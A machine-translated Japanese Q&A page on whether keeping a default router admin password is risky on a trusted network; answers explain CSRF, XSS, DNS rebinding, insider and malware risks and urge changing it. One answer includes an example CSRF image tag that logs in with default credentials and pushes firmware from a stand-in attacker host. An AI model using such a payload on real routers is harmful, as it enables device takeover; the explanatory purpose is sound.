web-dev-qa-db-ja.com

信頼できるユーザーのみがネットワークで許可されている場合、デフォルトのルーター管理者パスワードを使用するのは危険ですか?

記事アドレス指定デフォルトのルーター管理者パスワードの危険性 はたくさんあります。特定のセキュリティアプリケーションは、デフォルトのルータ管理パスワードも脆弱性として検出します。ただし、これらの記事はすべて、ルーターが危険にさらされた場合に発生する可能性があることに焦点を当てています。

ただし、管理パネルがローカルネットワークに対してのみ開かれるようにルーターが構成されているとします。さらに、ネットワークに(つまりwifi経由で)接続するためのパスワードは十分に安全(つまり、非常に高いエントロピー)であり、信頼できるユーザーのみがネットワーク上で許可されているとします。

これらの状況下でも、ルーターが危険にさらされる可能性はありますか?それでもデフォルトのルーター管理者パスワードを変更する必要はありますか?私の考えでは、攻撃者がネットワークに侵入できない場合、ルーターの管理者パスワードに関係なくルーターを危険にさらすことはできません。 CSRFは可能性がありますが、CSRFトークンで防御できます。私が考慮していない他の可能性はありますか?

55
Zsw

信頼できるユーザーのみがネットワークで許可されている場合、デフォルトのルーター管理者パスワードを使用するのは危険ですか?

Crying Buffalo

はい、危険です。これを行うには、いくつかの「技術的な」方法があります(それが悪いと言う場合を除きます)。


1. CSRF保護なし

あなたは幸いにもウェブサイトにアクセスしている可能性があり、それにはいくつかの問題がある可能性があります。

  1. ウェブサイト自体が不正使用され、悪意のあるコンテンツが挿入されている、または;
  2. ページ上の要素のいずれかが攻撃の途中でMITMになり(黙って、私はおかしくなろうとしている)、The Thing(tm)で傍受された要素がありました。
  3. CSRF攻撃は、スタイル、img、リンク、またはその他の何かによって挿入されました。

    大まかな例:

    <img src="http://admin:[email protected]/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>

多くの場合、そのようなリンクを介してadmin:admin @ routeripでログインできる場合、CSRF保護は役に立ちません。現在のセッションとトークンを使用する代わりに、新しいセッションとトークンを作成します。

New cigarette malware installed in your router's face

フルシェルアクセスを備えたルーターバックドア(tm)の最新のインストールおめでとうございます。


2. CSRF保護はあるが、適切なXSS保護はない

コンテキストをエスケープし、hax.js、または次の機能を実行できるJSコードのみを挿入します。

  1. JavaScriptでCSRFトークンを盗む
  2. 上記の<img src=""/>をご覧ください。

また、.svg画像は多くのXSS保護をバイパスできます。


3.ルーターの設定ページに無線ネットワーク経由でアクセスできますか?

誰かがワイヤレスネットワークにログインし、ルーターの設定ページにアクセスして、必要な変更を行ったり、ファームウェアをアップグレードしたり、DNSをリダイレクトしたり、必要に応じて何でも行います。最初のものと似ていますが、代わりにポイントアンドクリックインターフェイスを備えています。


4.その他の方法

  • 不満を持つ従業員
  • 誰かが別の侵害されたマシンを介してネットワーク上で自分の道を見つけた場合、彼らはそのマシンを使用してルーターを危険にさらすことができます。

XSS/CSRF攻撃が存在する可能性があること、またはベンダーががらくたである場合、アップグレード中に追加される可能性さえあることに留意してください。

だからそれをしないでください。お願いします。私の心はそれを取ることができません。 :(

45
Mark Buffalo

あなたが正しく気づいたようにCSRF攻撃は可能性があります。 CSRF攻撃を防止することはCSRFトークンで可能ですが、これはルーターのユーザーとして実行できることではありません。したがって、ルーターベンダーである場合は、CSRF保護を確実に実装する必要がありますが、ユーザーとしては、ベンダーが提供するものを使用する必要があり、多くのベンダーには適切なCSRF保護がありません。

CSRF以外にも、ルーターに対して使用できる他の攻撃があります。 CSRFと同様に、これらの多くはブラウザーをトランポリンとして使用します。つまり、エクスプロイトが埋め込まれている(広告に埋め込まれているなど)Webサイトにアクセスするだけで、ユーザーのコンピューターを侵害する必要はありません。これらの中で注目に値するのは、クロスサイトスクリプティング(XSS)とDNS再バインド攻撃です。ここでも、ベンダーは理論的には適切な保護を実装できますが、実際にはそれが行われないことがよくあります。

そして、信頼できるユーザーであっても、さまざまな方法でシステムが侵害される可能性があります。この場合、攻撃者は信頼できるネットワーク内にいて、デフォルトのパスワードを知っていると、ルーターの乗っ取りが非常に簡単になり、ネットワークに対する攻撃者の制御がより永続的でわかりにくくなります。

これは、適切に保護されていると考えている場合でも、徹底した防御の精神でパスワードをデフォルトから変更する必要があることを意味します。攻撃者がネットワークに侵入するために見つけなければならない未知数が多いほど、攻撃者は攻撃を困難にし、ネットワークをより安全に保護します。もちろん、これはパスワードだけでなくルーターの一般的なセキュリティにも当てはまります。つまり、一部のルーターにはバグがあり、バックドアがあり、乗っ取りのためにユーザーのパスワードを知る必要すらありません。ルーターだけでなく、プリンター、スキャナー、スマート電球、テレビなどの他のデバイスにも注意する必要があります。

45
Steffen Ullrich

はい、 ルーターはネットワーク内で実行されているマルウェアによって危険にさらされています デフォルトのパスワードのリストをテストしています。マルウェアは、感染したフィッシング添付ファイルまたはブラウザのエクスプロイトを介してネットワークに侵入します。

ローカルネットワークの外部でルーターを再構成できないことを検証できる場合は、デフォルトのパスワードを変更するだけでなく、修正する義務があります。

23
John Deters

この質問をしたのは異常で、セキュリティの専門家でもありません。 「地下で信頼できるレジ係のみが許可されている場合、銀行の金庫室のロックを解除したままにしても大丈夫ですか?」と尋ねるのと少し似ています。どこから始めればよいかわからない。質問は、スポーツに投稿されたALi Gスタイルのワインドアップだったのかと思いました。

デフォルトのパスワードは、何に対しても、パスワードを使用しないシステムよりも少し優れています。ある意味では、パスワード保護の錯覚を助長するので、それは実際にはより悪いです(これは、チェックとバランスおよび補償制御のシステムにおいて、システムのセキュリティ場所の他の部分が依存する根拠となる可能性がある根拠である可能性があります)。悪意のある人が入ってきた。それは、そこにいる人々にとって一種の裏口になる。ペンテスターは、ベンダーのデータシートやWebでデフォルトのパスワードを簡単に検索できることをITフェアで定期的にデモします。

デフォルトのパスワードの問題は、需要のない供給の究極の例であるモノのインターネットが機能し始めると、さらに悪化します。私はまだ、所有者のコンピューターIPを明らかにしているロンドンのハッキング可能なすべてのインターネットケトル(そう、本当にそうです)の投影された表示マップを見て、ユーザーのリモートスパイになり、再プログラミングされたカメラ付き人形の学習から逃れています虚辞を誓う。

21
Staycator

はい!

デフォルトのユーザー名またはパスワードを使用しないでください

理由は次のとおりです。

  1. ルーターは、バックドアに対して脆弱であることで有名です。 [つまり、ローカルネットワーク経由でのみアクセスできるように管理インターフェイスを構成した場合でも、インターネットに公開されている不正なバックドアポートが存在する可能性は低くありません。
  2. ルーターのWebコンソールは、CSRF、XSS、およびその他の多数の脆弱性に対して脆弱であることで有名です。上記の2つを連鎖させると、攻撃者は疑いを持たないユーザーをデフォルトのユーザー名パスワードでログインさせ、有効なリクエストを送信して設定を変更させることもできます。興味深いことに、ユーザーがWebゲームをプレイしている間、これらすべてのアクションはバックグラウンドで実行される可能性があります;)
  3. WiFiセキュリティは、パスワードエントロピーに完全には依存していません。使用するアルゴリズムにも依存します。
  4. ゼロデイ脆弱性が存在し、「信頼されたユーザーはそれらの被害者になる可能性があります。アカウントが侵害された場合、問題が発生します。
  5. 最後だが大事なことは;

CSRFは可能性がありますが、CSRFトークンで防御できます。

Tadaa ..ルーターはどれも、インターフェース用にまだ修正されていません。 23世紀には、おそらくそうなるでしょう。

6
hax

信頼できるユーザーでさえ、マシンがハッキングされる可能性があります。これを開始点として使用して、攻撃者はルーターへのフルアクセスを取得できます。つまり、内部からの攻撃が発生した場合の保護が低下します。これは、盲目的な典型的な例であるトロイの木馬です。

4
jdigital

これはぎこちないように聞こえるかもしれませんが、デバイスが分離されたネットワークにあるためにデフォルトのパスワードを変更しないように怠惰である場合、この安全なネットワークを設定するのに誰かが怠惰ではなかったとはどういうことですか?さらに、wifiを介したアクセスは、このネットワークが十分に安全であるという考えを覆します。デフォルトのパスワードが安全になるようにネットワークデバイスを物理的に分離する唯一の方法は、何も差し込まず(電源を含む)、具体的にケースに入れ、マリアナストレンチにドロップすることです。それでも、James Cameronがそれにアクセスすることを心配する必要があります。

3
Shackledtodesk

ワイヤレスAPに使用しているデバイスが危険にさらされてしまった場合...このネットワークに機密情報が含まれていると、最終的には悪い時間を過ごすことになります。

誰かがワイヤレスルーターの脆弱性を悪用する可能性はほとんどありませんか?はい。

それは可能ですか?はい。

ネットワークセキュリティについてリモートで真剣に考えている場合は、常にルーターのデフォルトパスワードを変更する必要があります。

まともなエンタープライズセキュリティデバイス(日常のネットワークスキャン、IDS、カスタムホストファイルを実行するデバイスなど、おもしろいもの)以外にも、マルウェアがネットワークに侵入して、パスワードがデフォルトに設定されているという事実を悪用することを妨げるものはまだありません。

結局のところ、エンドユーザーはネットワークを感染させることになります。

たぶんそれは時間の問題です。

「Jan in accounting」は86歳で、ジャックがinfosecについて知っているとします。

彼女はあなたが日常的に直面する他のすべての脅威よりも危険です。

パスワードを変更してください。デフォルトのユーザー名を変更します。

あらゆる種類の保護対策を実装しても、デフォルトのユーザー名とパスワードが原因で危険にさらされる可能性があります。不満に満ちた従業員、誰かがスマートでまだスクリプトキディを学習しているとき(子供を就業させるとき)、あらゆる種類のことが起こります。

なぜ企業で台頭するのですか?

そして、神の愛のためにこのパスワードを変更するとき、それを愚かなものにしないでください。私は、ネットワークの設定(誰もが許可するオープンシェア...何がどこにあるかを叫ぶすべてのもの...それらに非常に機密性の高い情報が含まれている)と、外向きのルーターへのパスワード...を見たことがあります。 '1234#businessname' ....クライアントに連絡して、セキュリティを真剣に受け止めていないIT管理会社を雇ったことをクライアントに知らせる義務があると感じました。

それからまたやるべきことがある。

彼らが暗号ロッカーに当たったときはいつでも、結果に直面することになります。

5万ドル/年のクライアントを失うことは、小さな会社に本当に害を及ぼす可能性があります。

3
Digital Shiba

「攻撃者がネットワークに侵入できない場合、ルーターを危険にさらすことはできないというのが私の考えです」の背後にある考え方に心を乱されます。これは、良いセキュリティにおける分離原理の認識の完全な欠如を裏切るようです。

グローバルまたはより離れた場所に配置されたコントロールの間接的な影響にすべての信頼を置くのではなく、リスクが発生した場所に直接適用できる関連する対策でリスクをコントロールします。

船は水を入れないことが期待されていますが(周囲の安全性が良好)、勤勉な造船業者は甲板の下の隔壁に適合します。そのため、他の場所で行われたすべての細かい設計作業の違反で発生する水の浸透は、小さな領域にとどまります(損傷制限)。コンパートメント化による)。運命的に名付けられたヘラルドオブフリーエンタープライズは、隔壁を取り付けることに煩わされないことでコストを削減しました。 1987年3月6日、オペレーターのミスにより、船首のドアを開けて水を入れました。それは暴力的にリストアップし、ほとんど港から出ていない間、転覆するのに90秒しかかかりませんでした。氷点下の水で193人が死亡した。

2
Staycator

元のQの背後にある「1つのリスク:したがって、1つのコントロールでそれを分類する」という暗黙の考えがあるのだろうかと思います。一方、リスクと統制の関係は多対多であり、1対1ではありません。

車のアラームがあるかもしれません。このコントロールは、車からの携帯品の盗難のリスクに対処し、車が持ち去られて追い出されるという個別のリスクにも対処します。 (i):1つのコントロール;複数の関連リスク。

また、ロック可能な車のドアがあります。これは別のコントロールですが、上記の2つのリスクに対処します。

各リスクは、複数のコントロール(アラームとドアロック)によって対処されます。
だから(ii):1つのリスク(それぞれを順番に取る);複数の関連コントロール。

車のアラームがあるからといって、車のドアをロックする手間が省けます。また、車の盗難に対しては、Krooklok装置またはステアリングホイールバー、イグニッションパスワードまたはブザー、またはリモートGPSトラッキング(1つのリスクに対して3つ、4つ、または5つのコントロール)を持っている可能性があります。後で車両を販売または複製しようとする試みに対して、フロントガラスにシャーシ番号と少なくとも1つの秘密の場所が刻印されています(車の盗難またはその直接的な影響に対して最大6つのコントロールを作成します)。

これらのコントロールはどれも、他のコントロールが配置されているという理由だけで不必要ではありませんが、私たちのほとんどは6つすべてを過剰と見なし、気まぐれなアラームや、重度の物理的なデバイスの不便さを気にせず、適切なセキュリティの負担が少ない場合はロックを解除する必要があると思いますも設置されています。

要約すると、リスクとそれらを処理する制御の関係は1対1ではなく、これはネットワークとルーターに他のすべてと同じように適用されます。

0
Staycator

聞いたことがあるかもしれませんが、"予防は治療よりも優れています"
ルーターのデフォルトのパスワードを変更したくない場合は、この面倒なことはしないでください。これは基本的な101クラスのものです。 常にデフォルトのパスワードを変更する。今日の状態がどれほど安全かは関係ありません。それらは時間とともに変化します。将来どのような種類の攻撃が生み出されるかは決してわかりません。何事にも頑張ってください。

0
Ugnes

原則として、単一障害点に決して依存しないでください。ここの全員が有効なポイントを持っています。誰かが本当にあなたのネットワークを望んでいるのなら、彼らがアクセスできるようになるのは本当に時間の問題です。ブルートフォース攻撃、DDOS攻撃、または認証されたユーザーの1人をだまして資格情報を漏らすソーシャルエンジニアリングにかかわらず、最終的には単一障害点が失敗します。インターネットに直接公開されているのと同じように、ネットワーク上で重要なすべてのものを保護します。また、機密の顧客情報を保存している場合、漏洩した場合は法的責任を負うことになります。

0
Shooter McGavin

原則として、これをデプロイするのに時間はかかりません。ルーターモデルに明らかにランダムではないパスワードが設定されている場合、製造元はlookのセキュリティを確保することすらしていません。彼らは信頼できないと考えられるべきです。安いルーターを売ろうとするメーカーは悪名高い 疑いの利益を与える価値はない 。これで信頼できないルーターができました。あなたが言うように、これは深刻なリスク要因になるでしょう。

信頼されたユーザーのみを持つように指定されたルーター(外部ポートを除く)は一般的ではありません。

ホームシステム一例として、セキュリティが低い(更新)スマートフォンをホストします。

ビジネスシステム通常、インフラストラクチャ設定を変更すべきでないユーザーをホストします。

演習として設定されたネットワークは、それを回避できるという理由だけで、安全でない設定を使用すべきではありません。運動は敗北した。 (例外:この演習は、特に安全でないデフォルトを示すことです)。

テスト用のネットワークは、まだある程度の注意が必要です。場合によっては、説明と一致することを期待します。ただし、これを決定する際には、標準のセキュリティを省略していることになります。繰り返しになりますが、原則として、このようなシステムを妨害する理由はありません。

Diceware は少し面倒ですが、適切な乱数を生成する問題を軽減します。ランダムなサイコロのページを生成するウェブサイトをGoogleで検索し、ランダムにロールを選びます。パスワードをルーターにテープで留めれば、完了です。

0
sourcejedi